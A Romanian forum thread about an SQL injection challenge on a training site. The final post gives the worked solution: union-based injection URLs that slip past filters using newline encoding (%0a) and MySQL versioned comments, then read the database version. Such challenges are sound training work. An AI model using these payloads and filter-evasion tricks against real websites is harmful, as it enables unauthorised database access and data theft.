Active Members dancezar Posted February 5, 2014 Active Members Report Share Posted February 5, 2014 (edited) Target:http://training.hi2.ro/test/lv1.php?id=1Method:Union basedTask:-Afisati numele vostru-Scoateti versiunea impreuna cu numele bazei de dateReguli:-Trimiteti sintaxa prin pm si postati un post cu o poza cenzurataProof:Note:Site-ul si scriptul nu sunt ale mele l-am gasit pe hy.Solvers:-Reckon-xTremeSurfer-Shello-askwrite Edited February 6, 2014 by danyweb09 Link to comment Share on other sites More sharing options...
Active Members dancezar Posted February 6, 2014 Author Active Members Report Share Posted February 6, 2014 Felicitari Reckon .Cine e urmatorul haideti baieti ca e simplu;) mai ales ca Reckon v-a lasat si cateva indicii in poza:)) Link to comment Share on other sites More sharing options...
xTremeSurfer Posted February 6, 2014 Report Share Posted February 6, 2014 PM Link to comment Share on other sites More sharing options...
Shello Posted February 6, 2014 Report Share Posted February 6, 2014 (edited) //editDe ce scrie Mediu.. e foarte usor...Nu ma trece si pe mine nimeni ? Edited February 6, 2014 by Shello Link to comment Share on other sites More sharing options...
Active Members dancezar Posted February 6, 2014 Author Active Members Report Share Posted February 6, 2014 //editDe ce scrie Mediu.. e foarte usor...Nu ma trece si pe mine nimeni ?Te-am trecut pe lista.Sa fim seriosi asta e https://rstforums.com/forum/80988-easy-sql-injection.rst challenge usor.Uite cateva challenge-uri care nu au fost inca inchisehttps://rstforums.com/forum/76012-hard-sql-injection.rsthttps://rstforums.com/forum/74593-sqli-challenge.rsthttps://rstforums.com/forum/75984-easy-sql-injection-challenge.rsthttps://rstforums.com/forum/76187-strange-sql-injection-challenge.rstPoti considera ca sunt foarte usoare:P Link to comment Share on other sites More sharing options...
Active Members dancezar Posted February 6, 2014 Author Active Members Report Share Posted February 6, 2014 Challenge closed!Felicitari inca odata celor 4 solveri :ReckonxtremesurfershelloaskwriteDesi multi care au incercat sa rezolve challenge-ul s-au aruncat repede la /*!50000 si la urlencode si prostii rezolvarea era foarte simpla si anume %0a care reprezinta caracterul newline si arata cam asa:Pentru numaratul coloanelor se folosete group by la care ii adaugati /*!12345http://training.hi2.ro/test/lv1.php?id=1%20/*!12345group*/%0Aby%201+--+si am obtinut 4 coloane cu care am construit injectia union based in felul urmator:http://training.hi2.ro/test/lv1.php?id=1%0Aand%0A0%0Aunion%0Aselect%0A1,2,3,4+--+Pentru extragerea versiuni se foloseste @@global.version . Link to comment Share on other sites More sharing options...